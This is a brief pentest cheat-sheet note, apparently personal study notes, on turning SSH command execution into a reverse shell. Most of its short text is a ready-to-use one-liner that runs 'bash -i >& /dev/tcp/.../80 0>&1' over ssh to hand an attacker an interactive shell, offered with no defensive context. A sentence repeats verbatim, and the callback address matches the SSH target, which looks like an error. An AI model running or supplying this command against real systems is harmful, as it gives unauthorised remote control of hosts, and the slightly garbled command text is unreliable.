reverse shell via ssh
If attacker face any error ( except wrong cred obivously) . he can try reverse shell through it
- ssh user@192.168.119.45 “ls -la”
- reverse shell, ssh user@192.168.119.45 “bash -i >& /dev/tcp/192.168.119.45/80 0>&1”
If attacker face any error ( except wrong cred obivously) . he can try reverse shell through it